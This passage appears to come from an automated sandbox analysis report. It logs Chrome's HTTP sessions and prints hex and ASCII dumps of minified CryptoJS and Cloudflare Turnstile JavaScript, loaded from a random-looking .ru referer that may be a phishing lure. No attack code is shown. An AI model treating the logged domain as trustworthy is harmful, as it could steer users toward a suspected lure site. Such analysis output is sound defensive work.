                                                                                                                                                                                                                                            Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1369INData Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30
                                                                                                                                                                                                                                            Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1369INData Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d
                                                                                                                                                                                                                                            Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0]
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1369INData Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75
                                                                                                                                                                                                                                            Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1369INData Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51
                                                                                                                                                                                                                                            Data Ascii: arAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1369INData Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73
                                                                                                                                                                                                                                            Data Ascii: .sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=this
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC1369INData Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b
                                                                                                                                                                                                                                            Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            116192.168.2.1749835104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC648OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://dm9h.zomivane.ru/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:34 UTC386INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:34 GMT
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            location: /turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6a38a7c4234-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            117192.168.2.1749836104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC647OUTGET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://dm9h.zomivane.ru/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:35 GMT
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 47521
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            accept-ranges: bytes
                                                                                                                                                                                                                                            last-modified: Wed, 08 Jan 2025 13:42:47 GMT
                                                                                                                                                                                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6a75a704370-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                            Data Ascii: "use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 41 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                            Data Ascii: e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 42 74 28 65 29 7c 7c 6a 74 28 65 2c 72 29 7c 7c 7a 74 28 65 2c 72 29 7c 7c 71 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 58 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Xt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 4b 74 3d 33 30 30 2c 24 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61
                                                                                                                                                                                                                                            Data Ascii: ecute"],e)}var Kt=300,$t=10;function yt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clea
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 49 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 75 2c 67 3d 4d 28 4e 72 2c 28 75 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 75 21 3d 3d 76 6f 69 64 20 30 3f 75 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 68 2c 6c 3d 4d 28 6b 72 2c 28 68 3d 28 6e 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 6e 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64
                                                                                                                                                                                                                                            Data Ascii: innerWidth<400,c=e.state===Ie.FAILURE_FEEDBACK||e.state===Ie.FAILURE_HAVING_TROUBLES,u,g=M(Nr,(u=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&u!==void 0?u:"nonexistent"),h,l=M(kr,(h=(n=e.displayLanguage)===null||n===void 0?void
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 53 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 53 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79 28 68 2c 75 29 3b 76 61 72 20 6c 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 68 29 2c 70 3d 6e 65 77 20 6c 3b 72 65 74 75 72 6e 20 67 26 26 5a 28 70 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 70 7d 2c 53 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63
                                                                                                                                                                                                                                            Data Ascii: urn!1}}function Se(e,r,n){return je()?Se=Reflect.construct:Se=function(c,u,g){var h=[null];h.push.apply(h,u);var l=Function.bind.apply(c,h),p=new l;return g&&Z(p,g.prototype),p},Se.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Objec
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 73 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 48 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 48 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 51 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 48 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63
                                                                                                                                                                                                                                            Data Ascii: ");throw new sr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){return e.startsWith(He)?e.substring(He.length):null}function Q(e){return"".concat(He).concat(e)}function Rt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=doc
